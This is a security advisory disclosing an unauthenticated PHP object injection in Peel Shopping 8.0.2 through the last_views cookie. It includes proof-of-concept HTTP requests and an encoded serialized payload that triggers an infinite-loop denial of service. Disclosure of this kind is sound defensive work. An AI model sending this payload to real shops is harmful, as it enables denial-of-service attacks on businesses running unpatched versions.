Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Peel Shopping 8.0.2
Fixed in:            8.0.3
Fixed Version Link:  www.peel-shopping.com
Vendor Website:      www.peel-shopping.com
Vulnerability Type:  Object Injection
Remote Exploitable:  Yes
Reported to vendor:  04/11/2016
Disclosed to public: 09/15/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview

Peel Shopping is ecommerce software written in PHP. In version 8.0.2, it is
vulnerable to Object Injection.

Peel Shopping stores a PHP object in a cookie, which is then unserialized when
received by the application. An attacker can send arbitrary PHP objects, and
has thus a limited influence on the control flow of the application. This can
for example lead to DOS attacks by creating an infinite loop.

3. Details

The last_views cookie is passed to unserialize, leading to Object Injection.
Authentication is not required.

The impact of the vulnerability is difficult to estimate, as it may increase
with the existence of further modules. Without any modules installed, it can at
a minimum lead to DOS.

Proof of Concept:

GET /peel-shopping_8_0_2/achat/produit_details.php?id=1 HTTP/1.1 
Host: localhost 
Cookie: last_views=[INJECTED_OBJECT];

DOS Example: The Smarty_Internal_Configfileparser class can be used to create
an infinite loop.

GET /peel-shopping_8_0_2/achat/produit_details.php?id=1 HTTP/1.1 
Host: localhost 
Accept-Encoding: gzip, deflate 
Cookie: last_views=
%4f%3a%33%32%3a%22%53%6d%61%72%74%79%5f%49%6e%74%65%72%6e%61%6c%5f%43%6f%6e%66%69%67%66%69%6c%65%70%61%72%73%65%72%22%3a%33%3a%7b%73%3a%37%3a%22%79%79%73%74%61%63%6b%22%3b%4e%3b%73%3a%35%3a%22%79%79%69%64%78%22%3b%69%3a%31%3b%73%3a%31%31%3a%22%79%79%54%6f%6b%65%6e%4e%61%6d%65%22%3b%61%3a%30%3a%7b%7d%7d;
Connection: close 

(Payload URL decoded:
O:32:"Smarty_Internal_Configfileparser":3:{s:7:"yystack";N;s:5:"yyidx";i:1;
s:11:"yyTokenName";a:0:{}})

4. Solution

To mitigate this issue please upgrade at least to version 8.0.3

Please note that a newer version might already be available.

5. Report Timeline

04/11/2016 Informed Vendor about Issue
04/12/2016 Vendor announces release of fix before 05/11/2016
09/14/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Peel-Shopping-802-Object-Injection-164.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-StraAe 54
10365 Berlin, Germany